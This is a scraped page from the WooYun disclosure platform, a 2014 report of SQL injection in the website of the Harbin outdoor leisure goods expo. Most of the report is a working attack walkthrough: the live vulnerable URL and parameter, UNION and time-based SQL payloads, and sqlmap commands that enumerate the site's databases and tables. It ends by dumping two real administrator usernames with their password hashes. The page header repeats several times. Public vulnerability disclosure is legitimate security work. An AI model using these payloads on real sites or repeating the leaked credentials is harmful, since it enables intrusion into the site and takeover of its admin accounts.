2014哈尔滨户外休闲用品博览会官网sql注入

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-061037

漏洞标题：2014哈尔滨户外休闲用品博览会官网sql注入

漏洞作者：从容

提交时间：2014-05-19 11:32

修复时间：2014-07-03 11:33

公开时间：2014-07-03 11:33

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：8

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-05-19：积极联系厂商并且等待厂商认领中，细节不对外公开
2014-07-03：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

看我如何"四步"拿下2014哈尔滨户外休闲用品博览会数据库

详细说明：

MYSQL注入导致数据库泄露- -.
注入地址：

http://www.olpe.cn/dy_show.php?tid=4&aid=22&id=62

漏洞证明：

---
Place: GET
Parameter: tid
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 column
    Payload: tid=4 LIMIT 1,1 UNION ALL SELECT CONCAT(0x3a6b6b6a3a,0x6d587449516a77654d49,0x3a676d7a3a)#&aid=22&id=62
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: tid=4 AND SLEEP(5)&aid=22&id=62
---

./sqlmap.py -u "http://www.olpe.cn/dy_show.php?tid=4&aid=22&id=62" --dbs

available databases [3]:                                                       
[*] information_schema
[*] olpecn
[*] test

./sqlmap.py -u "http://www.olpe.cn/dy_show.php?tid=4&aid=22&id=62" -D olpecn --tables

[22 tables]
+----------------+
| admanager      |
| admin          |
| adtype         |
| bigtype        |
| city           |
| comment        |
| goodsattribute |
| goodsattrvalue |
| goodsorder     |
| grzl           |
| infoclass      |
| infoflag       |
| infolist       |
| mail_config    |
| member         |
| message        |
| province       |
| userip         |
| webconfig      |
| weblink        |
| weblinktype    |
| wenjuan        |
+----------------+

./sqlmap.py -u "http://www.olpe.cn/dy_show.php?tid=4&aid=22&id=62" -D olpecn -T admin --columns

[8 columns]
+------------+----------------------+
| Column     | Type                 |
+------------+----------------------+
| checkadmin | enum('true','false') |
| id         | int(10) unsigned     |
| levelarray | varchar(255)         |
| levelname  | char(30)             |
| loginip    | varchar(20)          |
| logintime  | char(20)             |
| password   | char(32)             |
| username   | char(30)             |
+------------+----------------------+

./sqlmap.py -u "http://www.olpe.cn/dy_show.php?tid=4&aid=22&id=62" -D olpecn -T admin -C username,password --dump

[2 entries]
+---------------+----------------------------------+
| username      | password                         |
+---------------+----------------------------------+
| zhongshen     | a004c0bec4c5fcc51114a27b4895236a |
| zhongshenkeji | 594104dc8420b4bbc5b2cfd292ed92e9 |
+---------------+----------------------------------+

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-061037

漏洞标题：2014哈尔滨户外休闲用品博览会官网sql注入

相关厂商：哈尔滨户外休闲用品博览会官网

漏洞作者：从容

提交时间：2014-05-19 11:32

修复时间：2014-07-03 11:33

公开时间：2014-07-03 11:33

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：8

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源从容@乌云

漏洞回应

厂商回应：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-061037

漏洞标题：2014哈尔滨户外休闲用品博览会官网sql注入

相关厂商：哈尔滨户外休闲用品博览会官网

漏洞作者： 从容

提交时间：2014-05-19 11:32

修复时间：2014-07-03 11:33

公开时间：2014-07-03 11:33

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：8

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-061037"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 从容@乌云

漏洞回应

厂商回应：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：从容

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源从容@乌云